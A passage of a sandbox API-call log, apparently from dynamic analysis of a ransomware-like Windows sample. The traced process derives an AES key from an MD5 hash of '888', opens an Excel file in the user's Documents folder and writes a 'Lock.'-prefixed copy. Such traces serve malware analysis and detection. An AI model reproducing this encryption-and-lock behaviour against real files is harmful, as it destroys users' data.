1 [0215.839] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.839] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.839] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.839] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.839] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.839] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.839] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.839] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.840] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.840] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.840] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.840] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.840] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.840] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.840] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.840] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabb78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.840] CryptCreateHash (in: hProv=0xa7c330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.840] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.840] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.840] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaba58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.841] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.841] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.841] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.841] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.841] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.841] CryptDeriveKey (in: hProv=0xa7c330, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0215.841] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.841] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7140, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.841] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0215.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0215.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0215.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0215.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0215.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/iN034yd-ltTggQ-HcC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\in034yd-lttggq-hcc.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.844] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.844] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0215.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0215.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854998 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.846] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854998 | out: hHeap=0x2af0000) returned 1 [0215.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0215.846] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.iN034yd-ltTggQ-HcC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.in034yd-lttggq-hcc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0215.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e1020 [0215.852] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.852] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x8ed4, lpOverlapped=0x0) returned 1 [0215.854] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8ed4) returned 0x2a8a138 [0215.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e1020 | out: hHeap=0x2af0000) returned 1 [0215.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8ed4) returned 0x2a93018 [0215.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8ed4) returned 0x2a8a138 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: 